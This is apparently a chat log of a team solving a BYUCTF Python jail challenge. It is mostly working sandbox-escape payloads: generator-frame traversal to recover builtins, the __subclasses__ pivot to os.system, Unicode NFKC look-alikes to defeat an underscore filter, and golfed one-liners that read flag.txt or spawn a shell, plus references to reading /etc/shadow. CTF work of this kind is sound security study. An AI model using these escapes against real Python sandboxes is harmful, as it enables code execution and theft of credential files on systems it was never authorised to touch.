nc byuctf.xyz 40006

Files: ./flag.txt
Tags: Hard
(print:=(1 for _ in []))and(print.throw)

__s?

__traceback__ to traverse up from there i think

tr.__traceback__.tb_frame.f_back.f_globals["__builtins__"]

__builtins__ but gi_frame? (edited)

print.gi_code.replace()

replace(*, co_argcount=-1, co_posonlyargcount=-1, co_kwonlyargcount=-1, co_nlocals=-1, co_stacksize=-1, co_flags=-1, co_firstlineno=-1, co_code=None, co_consts=None, co_names=None, co_varnames=None, co_freevars=None, co_cellvars=None, co_filename=None, co_name=None, co_qualname=None, co_linetable=None, co_exceptiontable=None) method of builtins.code instance
    Return a copy of the code object with new values for the specified fields.

replace(co_code=b'asdasd')

<some func to nuke code of>.__code__ = <our code> needs dunders :< (edited)

(print:=(1 for _ in []))and(print.gi_frame.f_back.f_back.f_builtins)
AttributeError: 'NoneType' object has no attribute 'f_back'

try:
    "legoclonesiswatching"/2
except Exception as e:
    tr = e.__traceback__

gi_yieldfrom?
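a minimal sketch of that traceback idea, run outside any jail (inner is just an illustrative name): catch anything, then climb tb_frame.f_back to the caller's globals

def inner():
    try:
        "legoclonesiswatching"/2            # guaranteed TypeError
    except Exception as e:
        tr = e.__traceback__
        # tb_frame is inner's own frame; f_back is whoever called inner
        return tr.tb_frame.f_back.f_globals["__builtins__"]

print(inner())                              # the builtins of the calling module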
Calling locals() inside a comprehension now includes variables from outside the comprehension, and no longer includes the synthetic .0 variable for the comprehension "argument".

doesnt seem useful but also coool

adaptive is described under CACHE documentation:

    Rather than being an actual instruction, this opcode is used to mark extra space for the interpreter to cache useful data directly in the bytecode itself. It is automatically hidden by all dis utilities, but can be viewed with show_caches=True.
    Logically, this space is part of the preceding instruction. Many opcodes expect to be followed by an exact number of caches, and will instruct the interpreter to skip over them at runtime.
    Populated caches can look like arbitrary instructions, so great care should be taken when reading or modifying raw, adaptive bytecode containing quickened data.
    New in version 3.11.

dis describes this as adaptive

(await 1 for i in [1]) lol
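for reference, those CACHE slots can be made visible on CPython 3.11/3.12 with show_caches=True; a small demo:

import dis

# BINARY_OP carries an inline cache entry on 3.11; show_caches=True reveals it
dis.dis(compile("a + b", "<demo>", "eval"), show_caches=True)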
objs=[(await 1 for i in [])]

def recurse(o, depth=0):
    # walk every non-dunder attribute/key reachable from o, printing the path
    print(o)
    print(type(o))
    if type(o) == int: return
    if type(o) == bool: return
    if type(o) == str: return
    if type(o) == bytes: return
    if type(o) == float: return
    if depth > 10:
        return
    keys = set(dir(o))
    keys |= set(dir(type(o)))
    if hasattr(o, "keys"):
        try:
            keys |= o.keys()
        except:
            pass
    for n in filter(lambda x: "__" not in x, keys):
        print(" "*depth, end="--> ")
        print(n, end=" ")
        try:
            # dict-like objects are indexed, everything else goes through getattr
            if n in o:
                recurse(o[n], depth+1)
            else:
                recurse(getattr(o, n), depth+1)
        except:
            recurse(getattr(o, n), depth+1)

for o in objs:
    recurse(o)
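for reference, a quick look (outside the jail) at what that crawler turns up on a plain generator expression:

# the non-dunder attributes of a generator get past a "__" filter and still
# expose frame/code objects
g = (x for x in [])
print(sorted(a for a in dir(g) if "__" not in a))
# includes close, gi_code, gi_frame, gi_running, gi_yieldfrom, send, throw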
f_back is always none

# will never be true because get_output has a newline at the end?
if output[-4:] == "root":
    output += "$ cat /etc/shadow\n"
    output += get_output("$ cat /etc/shadow")
else:
    output += "$ cat /etc/passwd\n"
    # why no "$" here?
    output += get_output("cat /etc/passwd")
(output is actually a lookup into a dict, so mutable outside the code object), but there seem to be some more co_consts (namely \u202eXOR and nuivyg)

$ ?

except Exception as e needs Exception
Last but not least, we have three exception fields (f_exc_type, f_exc_value and f_exc_traceback), which are rather particular to generators

i found this on a shady corner of the internet (edited)
byuctf{unicode_is_always_the_solution...}

{}.__class__.__base__.__subclasses__()[-6]("","",["flag.txt"],["."])
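a hedged sketch of the same subclasses pivot without the hard-coded [-6] index (which shifts between interpreter builds): look a known class up by name instead, assuming os has already been imported in the target process (it essentially always is)

subclasses = {}.__class__.__base__.__subclasses__()
wrap_close = next(c for c in subclasses if c.__name__ == "_wrap_close")   # os._wrap_close
system = wrap_close.__init__.__globals__["system"]                        # __init__ was defined in os.py, so its globals are os' namespace
system("cat flag.txt")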
from unicodedata import normalize
for i in range(0x110000):
    if "_" in normalize("NFKC", chr(i)):
        print(chr(i))

︳
︴
﹍
﹎
﹏
_

ₚ gets normalized to p as well

int('𑱖') it gives you 6
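a sketch of why those look-alikes matter, assuming the interpreter accepts them in names: per PEP 3131 the parser NFKC-normalizes identifiers, so a name written with e.g. U+FE4F (﹏, from the list above) is the same name as one written with a plain underscore; it is only an XID_Continue character though, so it cannot start a name

from unicodedata import normalize

print(normalize("NFKC", "\ufe4f"))           # '_' (WAVY LOW LINE folds to LOW LINE)

# identifiers are NFKC-normalized at parse time, so these are the same variable
src = "flag\ufe4ftxt = 'byuctf{...}'\nprint(flag_txt)"
exec(src)                                     # prints byuctf{...}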
__ﬁle__ would give you the same as __file__ but using one character less... but like two more bytes

ﬁ normalises to 2 letters? (edited)

ﬂ for fl and then fill up using ag

(f:=(1 for _ in []))and(f.gi_frame.f_back.f_back.f_globals["_""_loader""_""_"].load_module("os").system("sh"))

3.11 is a much happier place

inp = input("code> ")
if "__" in inp or any(ord(c)>0x7f for c in inp):
    print("Nope")
else:
    print(eval(inp, {"__builtins__": {}}, {"__builtins__": {}}))
(edited)

[*([x.append((x[0].gi_frame.f_back.f_back.f_globals for _ in[1])) or x[0]for x in[[]]][0])][0]['_''_builtins_''_']

self ref makes a generator that is executing, which means f_back is preserved and you can use it to get globals (edited)

[*([x.append((x[0].gi_frame.f_back.f_back.f_builtins for _ in[1])) or x[0]for x in[[]]][0])][0]

ok the golf begins

(x:=[])or(a:=(a.gi_frame.f_back.f_back.f_builtins for a in x))and(x.append(a))or[*a][0]

[x:=[],a:=(a.gi_frame.f_back.f_back.f_builtins for a in x),x.append(a),*a][-1]

[x:=[],x.append(a:=(b.gi_frame.f_back.f_back.f_builtins for b in x)),*a][-1]

[*[x:=[],x.append(a:=(b.gi_frame.f_back.f_back.f_builtins for b in x)),*a][2]['open']('flag.txt')]
or for a shell I guess
[x:=[],x.append(a:=(b.gi_frame.f_back.f_back.f_builtins for b in x)),*a][2]['_''_import_''_']('os').system('sh')
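a minimal sketch of the self-reference trick outside the jail (one f_back here instead of two, since there is no intervening eval frame; box/gen are just illustrative names):

# while a generator body is executing, gi_frame.f_back is the frame that resumed it,
# so a genexpr that can reach a reference to itself can climb out to its caller
box = []
gen = (box[0].gi_frame.f_back for _ in [1])   # reads itself back out of box when run
box.append(gen)
caller = next(gen)                             # resumed from this module-level frame
print(caller.f_globals is globals())           # True
print("open" in caller.f_builtins)             # True: real builtins, even if eval hid them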